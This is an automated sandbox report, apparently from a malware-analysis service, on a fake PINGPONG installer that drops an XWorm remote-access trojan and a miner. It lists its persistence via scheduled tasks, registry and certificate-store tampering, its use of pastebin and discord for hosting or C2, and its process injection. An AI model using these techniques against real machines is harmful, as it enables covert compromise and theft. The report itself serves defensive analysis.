Malware Analysis Report

2024-11-16 13:37

Sample ID 240529-2c6j2sda85
Target PINGPONG-Setup-latest.exe
SHA256 f2126c0871f44d0629528ca475e82e347ac16013b2fbb7f30e54944df774fd01
Tags
pyinstaller xworm discovery execution rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f2126c0871f44d0629528ca475e82e347ac16013b2fbb7f30e54944df774fd01

Threat Level: Known bad

The file PINGPONG-Setup-latest.exe was found to be: Known bad.

Malicious Activity Summary

pyinstaller xworm discovery execution rat trojan

Detect Xworm Payload

Xworm

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Unsigned PE

Enumerates physical storage devices

Detects Pyinstaller

Modifies registry key

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Enumerates processes with tasklist

Modifies system certificate store

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

GoLang User-Agent

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-29 22:28

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 22:27

Reported

2024-05-29 22:30

Platform

win11-20240419-en

Max time kernel

76s

Max time network

79s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A discord.com N/A N/A
N/A pastebin.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\PINGPONG C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\PINGPONG\URL Protocol C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\PINGPONG\ = "URL:PINGPONG" C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\PINGPONG\shell\open\command C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\PINGPONG\shell C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\PINGPONG\shell\open C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\PINGPONG\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\PINGPONG\\PINGPONG.exe\" \"%1\"" C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 C:\ProgramData\rundll32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 C:\ProgramData\rundll32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C C:\ProgramData\rundll32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\installer.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\resources\miner-win32-x64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\resources\miner-win32-x64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\resources\miner-win32-x64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\resources\miner-win32-x64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\installer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\temporary3213340838\temp.bin N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1068 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe
PID 1068 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe
PID 2280 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe C:\Windows\system32\cmd.exe
PID 3300 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\ProgramData\rundll32.exe
PID 3300 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\ProgramData\rundll32.exe
PID 5112 wrote to memory of 1060 N/A C:\ProgramData\rundll32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 1060 N/A C:\ProgramData\rundll32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1060 wrote to memory of 4888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1060 wrote to memory of 4888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4888 wrote to memory of 5044 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4888 wrote to memory of 5044 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2280 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe C:\Windows\system32\cmd.exe
PID 5112 wrote to memory of 1588 N/A C:\ProgramData\rundll32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 1588 N/A C:\ProgramData\rundll32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1572 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\installer.exe
